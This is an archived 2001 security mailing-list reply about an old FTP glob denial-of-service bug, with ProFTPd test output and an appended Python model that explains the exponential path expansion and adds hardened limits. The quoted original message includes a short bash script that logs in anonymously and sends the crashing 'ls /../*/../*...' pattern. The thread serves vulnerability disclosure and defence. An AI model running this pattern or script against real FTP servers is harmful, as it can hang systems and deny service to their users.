Re: Multiple-Vendor-FTP-Vuln. (old?)

From: Dmitriy Kropivnitskiy (dkropivnitskiyat_private)
Date: Tue Aug 21 2001 - 07:46:39 PDT


    Tested on Mandrake 8.0. ProFTPd version is proftpd-1.2.2-0.rc1.3mdk.
    Here are the results:
    
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
    200 PORT command successful.
    150 Opening ASCII mode data connection for file list.
    226-Out of memory during globbing of
    /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
    Transfer complete.
    226 Quotas off
    ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
    200 PORT command successful.
    150 Opening ASCII mode data connection for file list.
    226-Out of memory during globbing of
    /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
    Transfer complete.
    226 Quotas off
    ftp> quit
    221 Goodbye.
    [root@system user]# ps aux | grep ftp
    nobody    3773  0.0  0.4  2152 1052 ?        S    10:44   0:00 proftpd (acceptin
    
    
    On Mon, Aug 20, 2001 at 03:20:35PM +0200, Enrico Kern wrote:
    > Hi,
    > 
    > I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
    > many new Linux distributions. When a user logs in via ftp and types
    > the ls command, in.ftpd takes over 90 percent CPU usage; execute
    > the command 2 or 3 times and the whole system hangs up. It also works in
    > the console. I wonder why that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ
    > in March 01, but
    > it still works, so I post it again.
    > 
    > Affected:
    > 
    > RedHat Linux 7.x
    > Linux Mandrake 8.0
    > SuSE Linux 7.2
    > FreeBSD 4.3
    > AIX V 4.3
    > other?
    > 
    > 
    > Not vulnerable:
    > 
    > latest Wu-Ftpd
    > Windows FTP server
    > 
    > 
    > Exploit:
    > 
    > #!/bin/bash
    > # Drive the stock ftp(1) client non-interactively (-n: no auto-login),
    > # log in as anonymous and send the pathological glob to the server.
    > # "quote" passes the raw command through; the original used the
    > # abbreviation "quot", which ftp(1) accepts as the same thing.
    > ftp -n FTP-SERVER <<\end
    > quote user anonymous
    > bin
    > quote pass shitoldat_private
    > ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
    > bye
    > end
    > 
    > Fix:
    > 
    > set a CPU limit for your anonymous user.
    > 
    > 
    > -------------------------
    > Enrico Kern
    > www.h07.org
    > 
    > 
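Added example (not part of either message above, and not ProFTPd or wu-ftpd code): a small Python model of why the pattern in the thread is so expensive. Each `*` under the root expands to every root entry, and the `..` that follows steps back to the root, but the path string built so far differs for every branch, so a naive glob walk never merges them: with N root entries and k wildcards it materialises N**k strings before it can answer, which is what the "Out of memory during globbing" line in the transcript above is reporting (the 12 wildcards in the exploit over a typical 20-entry root would be 20**12, roughly 4e15 strings). The toy filesystem, the `expand`/`guarded_ls` names and the caps in `guarded_ls` are constructed for this demonstration, not taken from any server.

```python
from fnmatch import fnmatchcase
from posixpath import normpath

# Constructed toy filesystem (not from the post): directory -> child names.
# Every child is itself a directory so that '..' and further '*' steps
# always succeed. A real '/' has about 20 entries, which is far worse.
TOY_FS = {
    "/": ["bin", "etc", "home", "lib", "pub", "usr", "var"],
}
for _name in TOY_FS["/"]:
    TOY_FS["/" + _name] = []


class GlobLimitExceeded(Exception):
    """Expansion exceeded the configured cap (the check the old servers lacked)."""


def exploit_pattern(wildcards):
    """Build the pattern from the post: '/../*' repeated `wildcards` times."""
    return "/../*" * wildcards


def _join(cand, comp):
    # Append a component without ever producing a '//' prefix.
    return cand + comp if cand.endswith("/") else cand + "/" + comp


def expand(pattern, fs=TOY_FS, max_results=None):
    """Expand `pattern` the way a naive glob(3)-style walk does.

    Matches are returned as the unnormalised strings the walk builds, e.g.
    '/../bin/../etc'. '/../bin/..' and '/../etc/..' name the same directory
    but are different strings, so nothing is merged and the working set
    multiplies by len(fs['/']) at every '*'. With max_results set, the walk
    aborts as soon as the working set passes the cap.
    """
    candidates = ["/"]
    for comp in (c for c in pattern.split("/") if c):
        if any(ch in comp for ch in "*?["):
            # Wildcard step: list the directory each candidate resolves to.
            next_cands = [
                _join(cand, name)
                for cand in candidates
                for name in fs.get(normpath(cand), [])
                if fnmatchcase(name, comp)
            ]
        else:
            # Literal step ('..' included): keep only candidates that exist.
            next_cands = [
                _join(cand, comp)
                for cand in candidates
                if normpath(_join(cand, comp)) in fs
            ]
        if max_results is not None and len(next_cands) > max_results:
            raise GlobLimitExceeded(
                f"{len(next_cands)} paths after {comp!r}, cap is {max_results}"
            )
        candidates = next_cands
    return candidates


def wildcard_depth(pattern):
    """Cheap pre-check: number of wildcard components, decided before any I/O."""
    return sum(1 for c in pattern.split("/") if any(ch in c for ch in "*?["))


def guarded_ls(pattern, fs=TOY_FS, max_wildcards=2, max_results=1000):
    """Hardened listing: refuse deep patterns up front, cap the walk anyway.

    Returns the matched paths, or None when the request is rejected.
    The limits are assumptions chosen for the demonstration.
    """
    if wildcard_depth(pattern) > max_wildcards:
        return None
    try:
        return expand(pattern, fs, max_results=max_results)
    except GlobLimitExceeded:
        return None


if __name__ == "__main__":
    n = len(TOY_FS["/"])
    for k in (1, 2, 3, 4):
        print(f"{k} wildcards -> {len(expand(exploit_pattern(k)))} paths (= {n}**{k})")
    try:
        expand(exploit_pattern(12), max_results=100_000)
    except GlobLimitExceeded as e:
        print("capped:", e)
    print("guarded_ls on the exploit pattern:", guarded_ls(exploit_pattern(12)))
```

Run it directly to watch the count multiply by 7 at every wildcard. The two defences shown, a pre-check on wildcard depth and a cap on the working set during the walk, remove the root cause; the per-user CPU limit suggested in the quoted message (ProFTPd exposes this as its RLimitCPU and RLimitMemory directives) only bounds how much damage one session can do before it is killed.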
    



    This archive was generated by hypermail 2b30 : Tue Aug 21 2001 - 09:58:47 PDT